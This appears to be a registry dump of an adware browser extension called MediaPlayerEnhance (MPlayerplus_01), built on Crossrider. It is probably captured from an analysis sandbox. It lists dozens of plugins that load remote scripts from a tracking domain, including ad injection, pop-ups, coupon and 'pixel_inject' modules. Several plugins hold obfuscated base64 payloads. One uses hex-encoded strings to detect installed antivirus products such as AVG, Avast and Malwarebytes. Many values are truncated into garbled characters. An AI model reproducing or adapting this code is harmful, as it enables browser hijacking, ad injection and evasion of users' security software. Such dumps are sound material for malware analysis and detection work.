"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/9.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/91.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/39.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
"PluginsManifestVersion" = "93"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInã³)"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA D4 DD 75 CB 86 A0 31 8F A3 75 ED 89 8F 72 10"
[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/64.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/273.js"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "23"
[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/40.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/93.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk2ZjcxNDYwZTFjMGUwMjIyMDgwZTQ3NDI0NDQ0MDAwZTA2MDc0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzEwMTAxMjE4MDkyNzA1MTY0MDVmNTg0NjBlMWMwZTAyMDQ0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzA4MDgxMzBmMTMxYzNlMWU0MDVmNTg1NjU3NTk1Njc4NTc1YTQyNDU1YTEyMDMxYTBlMWIxNDFiMGU0NzQyNDQzZDRhMWIxNjA0NTgzZjQ5NzI0NDQ2NDg1YTUwMWUxNDBlMGMxNjAxMmMzYjU4NDg1NzU4MTUwYzE2MDAwOTFmNTQyZDA1MGMxODU0NGY1NDU2MTA0YjQyNDM0ZjQyNTg1ODFmNDY0ZjBhMDcxNTE2MGIxNjEwMDExNDM3MDkwNzE1MTMwNjQyNDI0NDQxMzcyNTMxMjUzNTMxMzYyYTJkMjIyZDI4MmQzMjIyMzYyMDM2MjAyMzJjMjUyMTIyMzgzZDJjM2MzYjM5NGY1NjUyNTAxYjA2MDExNzBhMDgwOTE3MTc1MDQwNDI0MjI3M2IyNTNhMzUyMTI0MjgyYjIxM2QzNjM5MjkyYTIyMjgzNDIzMjgzZDNiMzk0ZjA3NDk1NTcwMWY=', 'bexdfhzrwz'); }"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsã…¤)"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM3YjQ3NGQ0NTQ2NDMwOTFmMGMwNzI0MTUwMTQ3NWM0MTQzMDMwYzAzMDE1ZDQyNGEwNzRmMTkwZDBhMTIxNDE0MDgxNzEwMDgwMjBlNTYxNDFlMGE0MjE1MDcxMzE1MDUxZDA1NWUwYTA0MDk1NDM3NTEzYzBiNTg0ZTA0MDQwMTViNTA1ODRkMGIxZTE1NWEzMjNhMjUzMzJlMzgyYjI1MzgyMzI4MzczOTI0MzkzZjNkMzkzNTIyMjkzYTM1MzQyMzM0MzEzMzJlMzg0YjA0MDIwNTIyMjk0NTQ2NTcwNjFkMTUxMjA4MTUwNzFkNGEyZTM4MmUzNzI5MzIzMjM5MzEzMzM0MzUzMjI0MzYzMTNlMjUzOTNhMzQzODMyNDc0YTZiNDE0YjU4NTc1MzBmMTkxMTE2MTIzNDE5MTQ1NTRiNDc0ZjBkMTIxNTExMTg0MjU4NWUwNjQzMWQwMDEzMDQwZTBiMTIwMzExMDQwNjAzNGYwMjA0MTU1ODAxMDYxZjExMDgwNDEzNDQxNTFlMWQ1NTNiNTUzMTEyNGU1NDFiMWUxNTVhNWM1YzQwMTIwODBmNDUyODJlMjQzZjJhMzUzMjMzMjIzYzMyMjMzODI4M2QzMjI0MmYyZjNkMzMyZTM0MzgyNzM5MjgyNTM0Mjc1MTEwMDMwOTI2MjQ1YzUwNGQxOTA3MDExMzA0MTEwYTA0NWMzNDI3MzQyMzI4M2UzNjM0MjgyNTJlMmEyODMwMzczZDNhMjgyMDJjMmUyNzI4NTM0YjY3NDU0NjQxNDE0OTA4MWIwNDAwMDQwYjJmMDU0MzUxNTg0NTQ5NWU2NzE4', 'wqgmefaakx'); }"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/263.js"
[HKCU\Software\MPlayerplus_01\Plugins\180]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/180.js"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/260.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/2.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "102"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/184.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"Name" = "sp_j_m"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/223.js"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/41.js"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/45.js"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64:)"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIw)"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/44.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/244.js"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
"UninstallerOfferUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=bÇÂÂ)"
[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/42.js"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
[HKCU\Software\MPlayerplus_01\Plugins\263]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\MPlayerplus_01\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "28"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/253.js"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/43.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/269.js"
[HKCU\Software\MPlayerplus_01\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,180,184,192,220,195,211,221,223,226,230,233,242,244,253,260,262,263,273,275,281,286,289,91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/286.js"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/289.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"
[HKCU\Software\MPlayerplus_01\Plugins\44]
